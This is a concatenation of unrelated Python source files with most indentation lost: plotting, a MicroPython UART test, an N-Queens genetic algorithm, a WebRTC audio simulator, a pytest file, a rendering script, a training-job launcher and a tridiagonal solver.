plt.savefig('yplot.jpg', dpi=200, bbox_inches='tight')
plt.show()
# plot phase portrait for (x, u)
plt.plot(data[0], data[1], lw=1, label='u(x)')
plt.xlabel('x')
plt.ylabel('u')
plt.legend()
plt.title('phase portrait u(x)')
plt.savefig('portrait_xu.jpg', dpi=200, bbox_inches='tight')
plt.show()
# plot phase portrait for (y, v)
plt.plot(data[2], data[3], lw=1, label='v(y)')
plt.xlabel('y')
plt.ylabel('v')
plt.legend()
    plt.title('phase portrait v(y)')
plt.savefig('portrait_yv.jpg', dpi=200, bbox_inches='tight')
plt.show()
if __name__ == "__main__":
main()
|
'''
P11 and P12 must be connected together for this test to pass.
'''
from machine import UART
from machine import Pin
import os
import time
# do not execute this test on the GPy and FiPy
if os.uname().sysname == 'GPy' or os.uname().sysname == 'FiPy':
print("SKIP")
import sys
sys.exit()
uart = UART(2, 115200)
print(uart)
uart.init(57600, 8, None, 1, pins=('P11', 'P12'))
uart.init(baudrate=9600, stop=2, parity=UART.EVEN, pins=('P11', 'P12'))
uart.init(baudrate=115200, parity=UART.ODD, stop=1, pins=('P11', 'P12'))
uart.read()
print (uart.read())
print (uart.readline())
buff = bytearray(1)
print (uart.readinto(buff, 1))
print (uart.read())
print (uart.any())
print (uart.write('a'))
uart.deinit()
uart = UART(2, 1000000, pins=('P12', 'P11'))
print(uart)
uart.read()
print(uart.write(b'123456') == 6)
print(uart.read() == b'123456')
uart.deinit()
uart = UART(2, 1000000, pins=('P11', 'P12'))
print(uart)
uart.read()
print(uart.write(b'123456') == 6)
print(uart.read() == b'123456')
uart.deinit()
uart = UART(2, 1000000, pins=('P11', 'P12'))
print(uart.write(b'123') == 3)
print(uart.read(1) == b'1')
print(uart.read(2) == b'23')
print(uart.read() == None)
uart.write(b'123')
buf = bytearray(3)
print(uart.readinto(buf, 1) == 1)
print(buf)
print(uart.readinto(buf) == 2)
print(buf)
uart.deinit()
# check for memory leaks...
for i in range (0, 1000):
uart = UART(2, 1000000)
uart.deinit()
# next ones must raise
try:
UART(2, 9600, parity=None, pins=('GP12', 'GP13', 'GP7'))
except Exception:
print('Exception')
try:
UART(2, 9600, parity=UART.ODD, pins=('GP12', 'GP7'))
except Exception:
print('Exception')
# buffer overflow
uart = UART(2, 1000000, pins=('P11', 'P12'))
buf = bytearray([0x55AA] * 567)
for i in range(200):
r = uart.write(buf)
r = uart.read()
r = uart.read()
print(r)
print(uart.write(b'123456') == 6)
print(uart.read() == b'123456')
uart.deinit()
|
# Copyright (C) 2019 "Daniel Bramblett" <daniel.r.bramblett@gmail.com>
import numpy as np
import random
from board_state import BoardState
# The instance that is the genetic algorithm which manages the population each generation and performs the crossover
# and mutation operation.
class GeneticAlgorithm:
# The size of the population each generation.
population_size = 0
    # The number of rows of the N-Queens problem. Note that this is also the number of columns.
number_of_rows = 8
# The list of the average fitness score for each generation.
average_fitness_per_generation = list()
# The list containing each member of the population.
population = None
# The list containing the new members generated during the current generation.
new_population = None
# The weight of the mutation rate used to weight the random pick.
weights = None
# The number of members checked for the tournament selection.
tournament_size = 4
# Initializes the fields in the class using the default or passed-in parameters. The initial population is then
# randomly generated.
def __init__(self, pop_size=100, mutation_rate=0.01, row_numb=8, tournament_size=4):
self.population_size = pop_size
self.number_of_rows = row_numb
self.weights = [1 - mutation_rate, mutation_rate]
self.generation_samples = list()
self.tournament_size = tournament_size
self.population = [BoardState(number_of_rows=self.number_of_rows) for _ in range(self.population_size)]
self.population.sort(reverse=True)
# Mutation operator that takes two indexes in the permutation and swaps them.
def __mutation_operator__(self, child):
swap_targets = random.sample(range(self.number_of_rows), 2)
temp = child.state[swap_targets[0]]
child.state[swap_targets[0]] = child.state[swap_targets[1]]
child.state[swap_targets[1]] = temp
# This function takes a state for the children. It then randomly decides if the child gets mutated or not. If the
# child is going to be mutated, the child is initialized and passed into the mutation operator to perform the
# mutation. Otherwise, the child is initialized and added to the new population without being mutated.
def __consider_mutate__(self, child_state):
if random.choices([0, 1], self.weights, k=1)[0]:
child = BoardState(child_state)
self.__mutation_operator__(child)
self.new_population.append(child)
else:
self.new_population.append(BoardState(child_state))
# Crossover operator that generates two new children using two parents from the current generation.
def __crossover_operator__(self, parent_a, parent_b):
first_child_state = parent_a.state.copy()
second_child_state = parent_b.state.copy()
indices_used = list()
for current_index in range(self.number_of_rows):
            if current_index in indices_used:
                continue
            if first_child_state[current_index] == second_child_state[current_index]:
                indices_used.append(current_index)
                continue
index_order = list()
value_order = list()
index_order.append(current_index)
value_order.append(first_child_state[current_index])
search_value = second_child_state[current_index]
while search_value != value_order[0]:
found = np.where(first_child_state == search_value)[0][0]
index_order.append(found)
value_order.append(search_value)
search_value = second_child_state[found]
for current in range(len(index_order) - 1):
first_child_state[index_order[current + 1]] = second_child_state[index_order[current - 1]] = value_order[current]
first_child_state[index_order[0]] = value_order[-1]
second_child_state[index_order[len(index_order) - 2]] = value_order[-1]
while len(index_order) > 0:
indices_used.append(index_order.pop(0))
self.__consider_mutate__(first_child_state)
self.__consider_mutate__(second_child_state)
# Uses tournament selection to select a member of the population as a parent.
def __select_parent__(self):
return self.population[min(random.sample(range(self.population_size), self.tournament_size))]
# Uses the current generation to generate the next generation.
def generate_next_generation(self):
self.new_population = list()
while len(self.new_population) < self.population_size:
self.__crossover_operator__(self.__select_parent__(), self.__select_parent__())
if len(self.new_population) > self.population_size:
self.new_population.pop()
self.population = self.new_population
self.population.sort(reverse=True)
# Current generation statistics.
def generation_statistics(self):
average_fitness = 0
max_fitness = 0
# Goes through each member of the population and calculates the average fitness while keeping track of the
# highest fitness score observed.
for current_member in self.population:
average_fitness += current_member.fitness_value
if current_member.fitness_value > max_fitness:
max_fitness = current_member.fitness_value
return average_fitness / self.population_size, max_fitness
# This function finds the member of the population with the highest fitness score and returns it.
def top_member(self):
# Initially assumes that the first member of the population has the highest fitness score and saves its index
# and fitness score.
current_top_fitness = self.population[0].fitness_value
current_top_index = list()
current_top_index.append(0)
    # Goes through each member of the population and checks their fitness score against the current top. If it's
# higher, the current member becomes the new top member and the fitness score and list of top indexes is
# updated.
# If the fitness score is equal to the top fitness score, the index is saved as a tie for the top fitness score.
for current_member in range(1, self.population_size):
if current_top_fitness < self.population[current_member].fitness_value:
current_top_index.clear()
current_top_index.append(current_member)
current_top_fitness = self.population[current_member].fitness_value
elif current_top_fitness == self.population[current_member].fitness_value:
current_top_index.append(current_member)
# From the list of top fitness score members, one is randomly chosen to be returned as a reference.
return self.population[random.choice(current_top_index)]
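# A hedged usage sketch (not part of the original file), assuming BoardState
# exposes the state and fitness_value attributes used above; the population
# size, mutation rate and generation count are arbitrary example values.
#
#   ga = GeneticAlgorithm(pop_size=100, mutation_rate=0.01, row_numb=8)
#   for _ in range(200):
#       ga.generate_next_generation()
#       avg_fitness, best_fitness = ga.generation_statistics()
#   print(ga.top_member().state)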
|
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""APM module simulator.
"""
import logging
import os
from . import annotations
from . import data_access
from . import echo_path_simulation
from . import echo_path_simulation_factory
from . import eval_scores
from . import exceptions
from . import input_mixer
from . import input_signal_creator
from . import signal_processing
from . import test_data_generation
class ApmModuleSimulator(object):
"""Audio processing module (APM) simulator class.
"""
_TEST_DATA_GENERATOR_CLASSES = (
test_data_generation.TestDataGenerator.REGISTERED_CLASSES)
_EVAL_SCORE_WORKER_CLASSES = eval_scores.EvaluationScore.REGISTERED_CLASSES
_PREFIX_APM_CONFIG = 'apmcfg-'
_PREFIX_CAPTURE = 'capture-'
_PREFIX_RENDER = 'render-'
_PREFIX_ECHO_SIMULATOR = 'echosim-'
_PREFIX_TEST_DATA_GEN = 'datagen-'
_PREFIX_TEST_DATA_GEN_PARAMS = 'datagen_params-'
_PREFIX_SCORE = 'score-'
def __init__(self, test_data_generator_factory, evaluation_score_factory,
ap_wrapper, evaluator, external_vads=None):
if external_vads is None:
external_vads = {}
self._test_data_generator_factory = test_data_generator_factory
self._evaluation_score_factory = evaluation_score_factory
self._audioproc_wrapper = ap_wrapper
self._evaluator = evaluator
self._annotator = annotations.AudioAnnotationsExtractor(
annotations.AudioAnnotationsExtractor.VadType.ENERGY_THRESHOLD |
annotations.AudioAnnotationsExtractor.VadType.WEBRTC_COMMON_AUDIO |
annotations.AudioAnnotationsExtractor.VadType.WEBRTC_APM,
external_vads
)
# Init.
self._test_data_generator_factory.SetOutputDirectoryPrefix(
self._PREFIX_TEST_DATA_GEN_PARAMS)
self._evaluation_score_factory.SetScoreFilenamePrefix(
self._PREFIX_SCORE)
# Properties for each run.
self._base_output_path = None
self._output_cache_path = None
self._test_data_generators = None
self._evaluation_score_workers = None
self._config_filepaths = None
self._capture_input_filepaths = None
self._render_input_filepaths = None
self._echo_path_simulator_class = None
@classmethod
def GetPrefixApmConfig(cls):
return cls._PREFIX_APM_CONFIG
@classmethod
def GetPrefixCapture(cls):
return cls._PREFIX_CAPTURE
@classmethod
def GetPrefixRender(cls):
return cls._PREFIX_RENDER
@classmethod
def GetPrefixEchoSimulator(cls):
return cls._PREFIX_ECHO_SIMULATOR
@classmethod
def GetPrefixTestDataGenerator(cls):
return cls._PREFIX_TEST_DATA_GEN
@classmethod
def GetPrefixTestDataGeneratorParameters(cls):
return cls._PREFIX_TEST_DATA_GEN_PARAMS
@classmethod
def GetPrefixScore(cls):
return cls._PREFIX_SCORE
def Run(self, config_filepaths, capture_input_filepaths,
test_data_generator_names, eval_score_names, output_dir,
render_input_filepaths=None, echo_path_simulator_name=(
echo_path_simulation.NoEchoPathSimulator.NAME)):
"""Runs the APM simulation.
Initializes paths and required instances, then runs all the simulations.
The render input can be optionally added. If added, the number of capture
input audio tracks and the number of render input audio tracks have to be
equal. The two lists are used to form pairs of capture and render input.
Args:
config_filepaths: set of APM configuration files to test.
capture_input_filepaths: set of capture input audio track files to test.
test_data_generator_names: set of test data generator names to test.
eval_score_names: set of evaluation score names to test.
output_dir: base path to the output directory for wav files and outcomes.
render_input_filepaths: set of render input audio track files to test.
echo_path_simulator_name: name of the echo path simulator to use when
render input is provided.
"""
assert render_input_filepaths is None or (
len(capture_input_filepaths) == len(render_input_filepaths)), (
'render input set size not matching input set size')
assert render_input_filepaths is None or echo_path_simulator_name in (
echo_path_simulation.EchoPathSimulator.REGISTERED_CLASSES), (
'invalid echo path simulator')
self._base_output_path = os.path.abspath(output_dir)
# Output path used to cache the data shared across simulations.
self._output_cache_path = os.path.join(self._base_output_path, '_cache')
# Instance test data generators.
self._test_data_generators = [self._test_data_generator_factory.GetInstance(
test_data_generators_class=(
self._TEST_DATA_GENERATOR_CLASSES[name])) for name in (
test_data_generator_names)]
# Instance evaluation score workers.
self._evaluation_score_workers = [
self._evaluation_score_factory.GetInstance(
evaluation_score_class=self._EVAL_SCORE_WORKER_CLASSES[name]) for (
name) in eval_score_names]
# Set APM configuration file paths.
self._config_filepaths = self._CreatePathsCollection(config_filepaths)
# Set probing signal file paths.
if render_input_filepaths is None:
# Capture input only.
self._capture_input_filepaths = self._CreatePathsCollection(
capture_input_filepaths)
self._render_input_filepaths = None
else:
# Set both capture and render input signals.
self._SetTestInputSignalFilePaths(
capture_input_filepaths, render_input_filepaths)
# Set the echo path simulator class.
self._echo_path_simulator_class = (
echo_path_simulation.EchoPathSimulator.REGISTERED_CLASSES[
echo_path_simulator_name])
self._SimulateAll()
def _SimulateAll(self):
"""Runs all the simulations.
Iterates over the combinations of APM configurations, probing signals, and
test data generators. This method is mainly responsible for the creation of
the cache and output directories required in order to call _Simulate().
"""
without_render_input = self._render_input_filepaths is None
# Try different APM config files.
for config_name in self._config_filepaths:
config_filepath = self._config_filepaths[config_name]
# Try different capture-render pairs.
for capture_input_name in self._capture_input_filepaths:
# Output path for the capture signal annotations.
capture_annotations_cache_path = os.path.join(
self._output_cache_path,
self._PREFIX_CAPTURE + capture_input_name)
data_access.MakeDirectory(capture_annotations_cache_path)
# Capture.
capture_input_filepath = self._capture_input_filepaths[
capture_input_name]
if not os.path.exists(capture_input_filepath):
# If the input signal file does not exist, try to create using the
# available input signal creators.
self._CreateInputSignal(capture_input_filepath)
assert os.path.exists(capture_input_filepath)
self._ExtractCaptureAnnotations(
capture_input_filepath, capture_annotations_cache_path)
# Render and simulated echo path (optional).
render_input_filepath = None if without_render_input else (
self._render_input_filepaths[capture_input_name])
render_input_name = '(none)' if without_render_input else (
self._ExtractFileName(render_input_filepath))
echo_path_simulator = (
echo_path_simulation_factory.EchoPathSimulatorFactory.GetInstance(
self._echo_path_simulator_class, render_input_filepath))
# Try different test data generators.
for test_data_generators in self._test_data_generators:
logging.info('APM config preset: <%s>, capture: <%s>, render: <%s>,'
'test data generator: <%s>, echo simulator: <%s>',
config_name, capture_input_name, render_input_name,
test_data_generators.NAME, echo_path_simulator.NAME)
# Output path for the generated test data.
test_data_cache_path = os.path.join(
capture_annotations_cache_path,
self._PREFIX_TEST_DATA_GEN + test_data_generators.NAME)
data_access.MakeDirectory(test_data_cache_path)
logging.debug('test data cache path: <%s>', test_data_cache_path)
# Output path for the echo simulator and APM input mixer output.
echo_test_data_cache_path = os.path.join(
test_data_cache_path, 'echosim-{}'.format(
echo_path_simulator.NAME))
data_access.MakeDirectory(echo_test_data_cache_path)
logging.debug('echo test data cache path: <%s>',
echo_test_data_cache_path)
# Full output path.
output_path = os.path.join(
self._base_output_path,
self._PREFIX_APM_CONFIG + config_name,
self._PREFIX_CAPTURE + capture_input_name,
self._PREFIX_RENDER + render_input_name,
self._PREFIX_ECHO_SIMULATOR + echo_path_simulator.NAME,
self._PREFIX_TEST_DATA_GEN + test_data_generators.NAME)
data_access.MakeDirectory(output_path)
logging.debug('output path: <%s>', output_path)
self._Simulate(test_data_generators, capture_input_filepath,
render_input_filepath, test_data_cache_path,
echo_test_data_cache_path, output_path,
config_filepath, echo_path_simulator)
@staticmethod
def _CreateInputSignal(input_signal_filepath):
"""Creates a missing input signal file.
The file name is parsed to extract input signal creator and params. If a
creator is matched and the parameters are valid, a new signal is generated
and written in |input_signal_filepath|.
Args:
input_signal_filepath: Path to the input signal audio file to write.
Raises:
InputSignalCreatorException
"""
filename = os.path.splitext(os.path.split(input_signal_filepath)[-1])[0]
filename_parts = filename.split('-')
if len(filename_parts) < 2:
raise exceptions.InputSignalCreatorException(
'Cannot parse input signal file name')
signal, metadata = input_signal_creator.InputSignalCreator.Create(
filename_parts[0], filename_parts[1].split('_'))
signal_processing.SignalProcessingUtils.SaveWav(
input_signal_filepath, signal)
data_access.Metadata.SaveFileMetadata(input_signal_filepath, metadata)
def _ExtractCaptureAnnotations(self, input_filepath, output_path,
annotation_name=""):
self._annotator.Extract(input_filepath)
self._annotator.Save(output_path, annotation_name)
def _Simulate(self, test_data_generators, clean_capture_input_filepath,
render_input_filepath, test_data_cache_path,
echo_test_data_cache_path, output_path, config_filepath,
echo_path_simulator):
"""Runs a single set of simulation.
Simulates a given combination of APM configuration, probing signal, and
test data generator. It iterates over the test data generator
internal configurations.
Args:
test_data_generators: TestDataGenerator instance.
clean_capture_input_filepath: capture input audio track file to be
processed by a test data generator and
not affected by echo.
render_input_filepath: render input audio track file to test.
test_data_cache_path: path for the generated test audio track files.
echo_test_data_cache_path: path for the echo simulator.
output_path: base output path for the test data generator.
config_filepath: APM configuration file to test.
echo_path_simulator: EchoPathSimulator instance.
"""
# Generate pairs of noisy input and reference signal files.
test_data_generators.Generate(
input_signal_filepath=clean_capture_input_filepath,
test_data_cache_path=test_data_cache_path,
base_output_path=output_path)
# Extract metadata linked to the clean input file (if any).
apm_input_metadata = None
try:
apm_input_metadata = data_access.Metadata.LoadFileMetadata(
clean_capture_input_filepath)
except IOError as e:
apm_input_metadata = {}
apm_input_metadata['test_data_gen_name'] = test_data_generators.NAME
apm_input_metadata['test_data_gen_config'] = None
# For each test data pair, simulate a call and evaluate.
for config_name in test_data_generators.config_names:
logging.info(' - test data generator config: <%s>', config_name)
apm_input_metadata['test_data_gen_config'] = config_name
# Paths to the test data generator output.
# Note that the reference signal does not depend on the render input
# which is optional.
noisy_capture_input_filepath = (
test_data_generators.noisy_signal_filepaths[config_name])
reference_signal_filepath = (
test_data_generators.reference_signal_filepaths[config_name])
# Output path for the evaluation (e.g., APM output file).
evaluation_output_path = test_data_generators.apm_output_paths[
config_name]
# Paths to the APM input signals.
echo_path_filepath = echo_path_simulator.Simulate(
echo_test_data_cache_path)
apm_input_filepath = input_mixer.ApmInputMixer.Mix(
echo_test_data_cache_path, noisy_capture_input_filepath,
echo_path_filepath)
# Extract annotations for the APM input mix.
apm_input_basepath, apm_input_filename = os.path.split(
apm_input_filepath)
self._ExtractCaptureAnnotations(
apm_input_filepath, apm_input_basepath,
os.path.splitext(apm_input_filename)[0] + '-')
# Simulate a call using APM.
self._audioproc_wrapper.Run(
config_filepath=config_filepath,
capture_input_filepath=apm_input_filepath,
render_input_filepath=render_input_filepath,
output_path=evaluation_output_path)
try:
# Evaluate.
self._evaluator.Run(
evaluation_score_workers=self._evaluation_score_workers,
apm_input_metadata=apm_input_metadata,
apm_output_filepath=self._audioproc_wrapper.output_filepath,
reference_input_filepath=reference_signal_filepath,
render_input_filepath=render_input_filepath,
output_path=evaluation_output_path,
)
# Save simulation metadata.
data_access.Metadata.SaveAudioTestDataPaths(
output_path=evaluation_output_path,
clean_capture_input_filepath=clean_capture_input_filepath,
echo_free_capture_filepath=noisy_capture_input_filepath,
echo_filepath=echo_path_filepath,
render_filepath=render_input_filepath,
capture_filepath=apm_input_filepath,
apm_output_filepath=self._audioproc_wrapper.output_filepath,
apm_reference_filepath=reference_signal_filepath,
apm_config_filepath=config_filepath,
)
except exceptions.EvaluationScoreException as e:
logging.warning('the evaluation failed: %s', e.message)
continue
def _SetTestInputSignalFilePaths(self, capture_input_filepaths,
render_input_filepaths):
"""Sets input and render input file paths collections.
Pairs the input and render input files by storing the file paths into two
collections. The key is the file name of the input file.
Args:
capture_input_filepaths: list of file paths.
render_input_filepaths: list of file paths.
"""
self._capture_input_filepaths = {}
self._render_input_filepaths = {}
assert len(capture_input_filepaths) == len(render_input_filepaths)
for capture_input_filepath, render_input_filepath in zip(
capture_input_filepaths, render_input_filepaths):
name = self._ExtractFileName(capture_input_filepath)
self._capture_input_filepaths[name] = os.path.abspath(
capture_input_filepath)
self._render_input_filepaths[name] = os.path.abspath(
render_input_filepath)
@classmethod
def _CreatePathsCollection(cls, filepaths):
"""Creates a collection of file paths.
Given a list of file paths, makes a collection with one item for each file
    path. The value is the absolute path, the key is the file name without
    extension.
Args:
filepaths: list of file paths.
Returns:
A dict.
"""
filepaths_collection = {}
for filepath in filepaths:
name = cls._ExtractFileName(filepath)
filepaths_collection[name] = os.path.abspath(filepath)
return filepaths_collection
@classmethod
def _ExtractFileName(cls, filepath):
return os.path.splitext(os.path.split(filepath)[-1])[0]
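# A hedged sketch (not part of the original module) of a typical invocation;
# the factory, wrapper and evaluator objects are assumed to be constructed by
# the surrounding test framework, and the generator/score names below are
# placeholders for keys of the registered-class dictionaries used above.
#
#   simulator = ApmModuleSimulator(datagen_factory, score_factory,
#                                  apm_wrapper, evaluator)
#   simulator.Run(config_filepaths=['apm_config.json'],
#                 capture_input_filepaths=['capture.wav'],
#                 test_data_generator_names=['<registered generator name>'],
#                 eval_score_names=['<registered score name>'],
#                 output_dir='/tmp/apm_sim_output')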
|
"""Test the magic commands used to update variables and trace properties.
We expect the correct updates to be performed when a valid input is given, and the
correct warnings to be shown when an invalid one is.
"""
import pytest
from tests.unit.autoplot.mocks import COL, DF, DF_COL, DF_COL_ALT, VAR
@pytest.mark.parametrize("initial,final", [(VAR, "new"), (VAR, "my var"), (VAR, "m1 var!"), (DF_COL, "c")])
def test_rename_valid_names(initial, final, full_autoplot_magic):
magic = full_autoplot_magic()
magic.autoplot(f"--rename '{initial}' '{final}'")
# test label set to correct value
assert magic.view_manager.active_view._plotter[initial].get_label() == final
assert magic.view_manager.active_view._plotter._changed
def test_rename_dataframe(full_autoplot_magic):
initial = DF
final = "new"
magic = full_autoplot_magic()
magic.autoplot(f"--rename {initial} {final}")
# test label set to correct value
assert magic.view_manager.active_view._plotter[DF_COL].get_label() == DF_COL.replace(initial, final)
assert magic.view_manager.active_view._plotter[DF_COL_ALT].get_label() == DF_COL_ALT.replace(initial, final)
@pytest.mark.parametrize("initial", ["undef", "", COL])
def test_rename_undefined_variable(mock_toast, initial, full_autoplot_magic):
toast = mock_toast
magic = full_autoplot_magic(toast)
magic.autoplot(f"--rename '{initial}' new")
# test plotter not changed and toast show
assert not magic.view_manager.active_view._plotter._changed
toast.unrecognised_variable.assert_called_once_with(initial)
|
a=[1,34,45,23,47,56,32,24,13,67,98,90,77,76,3,2]
o=[]
e=[]
for i in range(0,len(a)):
if (a[i]%2==0):
e.append(a[i])
else:
o.append(a[i])
print("The odd values are",o)
print("The even values are",e)
print("ascending order of numbers: ")
e.sort()
o.sort()
print("EVEN NUMBERS",e)
print("ODD NUMBERS",o)
"""for i in range(0,len(o)-1):
if o[i]<o[i+1]:
# print(o[i])
print("")
else:
t=o[i]
o[i]=o[i+1]
o[i+1]=t
for i in range(len(o)):
print(o[i],end=" ")
print("\nascending order of even numbers: ")
for i in range(0,len(e)-1):
if e[i]<e[i+1]:
# print(e[i])
print("")
else:
t=e[i]
e[i]=e[i+1]
e[i+1]=t
for i in range(len(e)):
print(e[i],end=" ")
#print(o[i])
#print("The ascending of odd numbers: ",o)"""
|
import os
import numpy as np
import sys
import tensorflow as tf
import dirt
import skimage.io
canvas_width, canvas_height = 960, 640
def get_dirt_pixels_render(render_op, par_dims=8):
square_vertices = tf.constant([[-1, -1, 0, 1], [-1, 1, 0, 1], [1, 1, 0, 1], [1, -1, 0, 1]], dtype=tf.float32)
background = tf.random_normal([canvas_height, canvas_width, 3], dtype=tf.float32)
dirt_op = getattr(dirt, render_op)
camera_pos = tf.placeholder(tf.float32, par_dims)
return dirt_op(
vertices=square_vertices,
faces=[[0, 1, 2], [0, 2, 3]],
vertex_colors=tf.ones([4, 3]),
background=background,
camera_pos = camera_pos,
height=canvas_height, width=canvas_width, channels=3
), camera_pos, background
def get_par_dims(render_op):
if render_op == 'oceanic_still_cloud':
par_dims = 9
else:
par_dims = 8
return par_dims
def main():
assert len(sys.argv) > 5
outdir = sys.argv[1]
prefix = sys.argv[2]
simple_render_op = sys.argv[3]
complex_render_op = sys.argv[4]
nvideos = int(sys.argv[5])
nframes_per_video = 30
framerate = 30
simple_par_dims = get_par_dims(simple_render_op)
complex_par_dims = get_par_dims(complex_render_op)
global canvas_width, canvas_height
if complex_render_op.startswith('ocean'):
canvas_width = 960
canvas_height = 540
nsamples = 100
else:
canvas_width = 1024
canvas_height = 768
nsamples = 1
render_par_vals = np.empty([nvideos, nframes_per_video, max(simple_par_dims, complex_par_dims)])
ans = get_dirt_pixels_render(simple_render_op, simple_par_dims)
simple_render_node = ans[0]
simple_camera_pos = ans[1]
ans = get_dirt_pixels_render(complex_render_op, complex_par_dims)
complex_render_node = ans[0]
complex_camera_pos = ans[1]
sess = tf.Session()
img = np.empty([canvas_height, canvas_width, 3])
feed_dict = {}
simple_camera_pos_val = np.empty(simple_par_dims)
complex_camera_pos_val = np.empty(complex_par_dims)
speed_max = np.zeros(6)
# x speed
speed_max[0] = 150.0
# y speed
speed_max[1] = 50.0
# z speed
speed_max[2] = 150.0
# ang1 speed
speed_max[3] = 0.1
# ang2 speed
speed_max[4] = 0.2
# ang3 speed
speed_max[5] = 0.1
speed_max /= 2
def h00(t):
return 2 * t ** 3 - 3 * t ** 2 + 1
def h10(t):
return t ** 3 - 2 * t ** 2 + t
def h01(t):
return -2 * t ** 3 + 3 * t ** 2
def h11(t):
return t ** 3 - t ** 2
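    # h00, h10, h01 and h11 above are the cubic Hermite basis functions. On each half of a
    # clip the camera parameters below are interpolated as
    #   p(t) = h00(t)*p0 + h10(t)*m0*t_scale + h01(t)*p1 + h11(t)*m1*t_scale,  t in [0, 1],
    # where p0/p1 are the endpoint positions and m0/m1 the (unscaled) endpoint tangents.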
for ind_v in range(nvideos):
ini_camera_pos_val = np.random.random(9)
ini_camera_pos_scale = np.array([1000, 500, 1000, 0.4, 2*np.pi, 0.4, 180, 2.0, 180])
ini_camera_pos_bias = np.array([0, 100, 0, -0.1, 0, -0.2, 0.0, 0.2, 0.0])
ini_camera_pos_val *= ini_camera_pos_scale
ini_camera_pos_val += ini_camera_pos_bias
ini_camera_pos_only = ini_camera_pos_val[:6]
speed1 = np.random.random(6) * 2.0 * speed_max - speed_max
speed2 = np.random.random(6) * 2.0 * speed_max - speed_max
mid_camera_pos_only = ini_camera_pos_only + speed1 * nframes_per_video / 2 / framerate
final_camera_pos_only = mid_camera_pos_only + speed2 * nframes_per_video / 2 / framerate
interp_p = [ini_camera_pos_only,
mid_camera_pos_only,
final_camera_pos_only]
interp_unscaled_m = [np.random.random(6) * 2.0 * speed_max - speed_max,
final_camera_pos_only - ini_camera_pos_only,
np.random.random(6) * 2.0 * speed_max - speed_max]
#interp_unscaled_m = [np.zeros(6), final_camera_pos_only - ini_camera_pos_only, np.zeros(6)]
for ind_f in range(nframes_per_video):
if ind_f < nframes_per_video / 2:
p0 = interp_p[0]
p1 = interp_p[1]
m0 = interp_unscaled_m[0] / (nframes_per_video)
m1 = interp_unscaled_m[1] / (nframes_per_video)
t = ind_f
else:
p0 = interp_p[1]
p1 = interp_p[2]
m0 = interp_unscaled_m[1] / (nframes_per_video)
m1 = interp_unscaled_m[2] / (nframes_per_video)
t = ind_f - nframes_per_video / 2
t_scale = nframes_per_video / 2
t /= t_scale
simple_camera_pos_val[:6] = h00(t) * p0 + \
h10(t) * m0 * t_scale + \
h01(t) * p1 + \
h11(t) * m1 * t_scale
complex_camera_pos_val[:6] = simple_camera_pos_val[:6]
simple_camera_pos_val[6] = ini_camera_pos_val[6] + ind_f / framerate
complex_camera_pos_val[6] = simple_camera_pos_val[6]
simple_camera_pos_val[7:] = ini_camera_pos_val[7:simple_par_dims]
complex_camera_pos_val[7:] = ini_camera_pos_val[7:complex_par_dims]
render_par_vals[ind_v, ind_f, :simple_par_dims] = simple_camera_pos_val[:]
render_par_vals[ind_v, ind_f, :complex_par_dims] = complex_camera_pos_val[:]
feed_dict[simple_camera_pos] = simple_camera_pos_val
img[:] = 0.0
for _ in range(nsamples):
dirt_pixels = sess.run(simple_render_node, feed_dict=feed_dict)
img += dirt_pixels
img /= nsamples
skimage.io.imsave(os.path.join(outdir, '%s_%05d_simple_%05d.png' % (prefix, ind_v, ind_f)), np.clip(img, 0.0, 1.0))
feed_dict[complex_camera_pos] = complex_camera_pos_val
img[:] = 0.0
for _ in range(nsamples):
dirt_pixels = sess.run(complex_render_node, feed_dict=feed_dict)
img += dirt_pixels
img /= nsamples
skimage.io.imsave(os.path.join(outdir, '%s_%05d_complex_%05d.png' % (prefix, ind_v, ind_f)), np.clip(img, 0.0, 1.0))
print(ind_v, ind_f)
np.save(os.path.join(outdir, '%s_camera_pos.npy' % prefix), render_par_vals)
if __name__ == '__main__':
main()
|
from subprocess import call
import sys
action = ['Greeting','Sitting','SittingDown','WalkTogether','Phoning','Posing','WalkDog','Walking','Purchases','Waiting','Directions','Smoking','Photo','Eating','Discussion']
group = [1, 2, 3, 5]
for i in action:
cmd = """nohup python -u run.py --model srnet -arc 1,1,1 --use-action-split True --train-action {} -mn sr_t1_crossaction_act{} > log/sr_t1_crossaction_act{}.log 2>&1&""".format(i,i,i)
print(cmd)
call(cmd, shell=True)
print('Finish!')
|
import numpy
def solve_tridiagonal_system(N, a, b, c, r):
"""Efficiently solve a tridiagonal system.
For example if,
x + y = 3
y + z = 5
y + 2z = 8
then,
A = 3x3
[ 1 1 0
0 1 1
0 1 2 ]
and r = [ 3, 5, 8 ]' for which the expected
result is x = [1, 2, 3].
>>> a, b, c = [None, 0, 1], [1, 1, 2], [1, 1, None]
>>> r =[3, 5, 8]
>>> print solve_tridiagonal_system(3, a, b, c, r)
[ 1. 2. 3.]
"""
u, gam = numpy.zeros(N), numpy.zeros(N)
bet = b[0]
if bet == 0.0:
raise RuntimeError, "Solve diagonal system error"
u[0] = r[0]/bet
for j in range(1, N):
gam[j] = c[j - 1]/bet
bet = b[j]- a[j]*gam[j]
if bet == 0.0:
raise RuntimeError, "Solve diagonal system error"
u[j] = (r[j] - a[j]*u[j - 1])/bet
for j in range(N - 2, -1, -1):
u[j] -= gam[j + 1]*u[j + 1]
return u
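# Note: this is the Thomas algorithm for tridiagonal systems -- a, b and c hold the
# sub-, main- and super-diagonals, and the forward sweep plus back substitution runs in O(N).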
def solve_upper_diagonal_system(a, b):
"""Efficiently solve an upper diagonal system.
For example, if
A = 3 x 3
[ 1.75 1.5 -2.5
0 -0.5 0.65
0 0 0.25 ]
and
b = [ 0.5 -1 3.5],
the expected result is x = [2.97142857 20.2 14].
>>> from numpy import *
>>> A = matrix(array(
... [[1.75, 1.5, -2.5],
... [0.0, -0.5, 0.65],
... [0.0, 0.0, 0.25]], float))
>>> A
matrix([[ 1.75, 1.5 , -2.5 ],
[ 0. , -0.5 , 0.65],
[ 0. , 0. , 0.25]])
>>> b = array([0.5, -1.0, 3.5])
>>> b
array([ 0.5, -1. , 3.5])
>>> x = solve_upper_diagonal_system(A, b)
>>> x = matrix(x).transpose() # column vector
>>> x
matrix([[ 2.97142857],
[ 20.2 ],
[ 14. ]])
>>> A*x #matrix vector product
matrix([[ 0.5],
[-1. ],
[ 3.5]])
"""
if len(a.shape) <> 2:
raise RuntimeError, "Expected 'a' to be a matrix"
if a.shape[0] <> a.shape[1]:
